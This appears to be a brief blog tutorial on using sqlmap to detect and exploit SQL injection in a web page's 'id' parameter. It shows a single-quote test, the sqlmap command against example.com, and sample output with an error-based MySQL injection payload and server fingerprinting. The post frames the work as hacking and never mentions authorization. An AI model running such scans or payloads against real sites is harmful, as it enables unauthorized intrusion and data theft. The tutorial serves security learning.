How to use sqlmap to exploit a vulnerable web application and see what can be done with such a tool.
Let’s say you have a url like this
Now is this site prone to sql injection because the developer of that site did not properly escape the parameter id. This can be tested simply by trying to open the url
We just added a single quote in the parameter. If this url throws an error, then it is clear that the database has reacted with an error because it got an unexpected single quote.
Hacking with sqlmap
Now it’s time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.
python sqlmap.py -u “ http://www.example.com/section.php?id=51”
The above is the first and most simple command to run with the sqlmap tool. It will check the url and try to discover basic information about the system. The output can look something like this
[*] starting at 12:10:33[12:10:33] [INFO] resuming back-end DBMS ‘mysql’
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
There you are, the sqlmap tool has discovered the Operating system, web server, and database along with version information.